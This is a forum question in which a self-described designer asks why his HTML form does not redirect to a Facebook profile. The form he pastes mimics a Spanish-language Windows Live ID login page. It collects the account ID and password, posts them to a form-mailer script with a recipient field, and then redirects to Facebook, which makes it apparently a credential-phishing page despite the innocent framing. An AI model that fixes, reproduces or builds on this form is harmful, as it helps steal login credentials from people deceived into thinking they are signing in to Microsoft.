I hope this may be simple for someone. I have a simple html form with a redirect to an external Facebook page. Its there something special I need to do for Facebook? It does not redirect to the Facebook page. I tried a redirect to another one of my sites and it works fine.
I have gone through previous questions and seems they mostly concern custom apps and more technical things. I'm more on the design side so code usually baffles me. So please don't laugh.
I'm thanking your genius in advance.
Mark
I'm adding the source code for the form (it is confidential so I changed characters to "x" where needed): I might have butchered the code a little in placing it.
</td>
<td width="327" valign="top">
<p class="style15"><span class="style16"><span class="style23"><br /> iniciar sesión</span><br />
</span><span class="style18"><br /> <br /> </span></p>
<form action="/xxxxxxx.net/ProcessForm.php" method="post" name="Form" id="Form">
<input type="hidden" name="recipient" value="0,1" />
<input type="hidden" name="subject" value="Form Submission" />
<input name="redirect" type="hidden" id="redirect" value="http://www.facebook.com/people/xxxxxx%C3%ADa/xxxxxxxxxxxx">
<p class="style15"><span class="style25">Windows Live ID:<br /> <input name="textfield2" type="text" id="textfield2" value="xxxxxx_xxxxxx.com" size="50" />
</span></p>
<p><span class="style25">Contraseña:</span><span class="style18"><br /> </span> <input name="passw" type="password" id="passw" size="50" />
<br /> <span class="style20"><a href="#">¿No puede acceder a su cuenta?</a> </span></p>
<label> <input type="checkbox" name="checkbox" id="checkbox" /> </label> <span class="style18">Mantener la sesión iniciada</span>
<p><input type="submit" name="submit" value="Iniciar_sesión" /></p>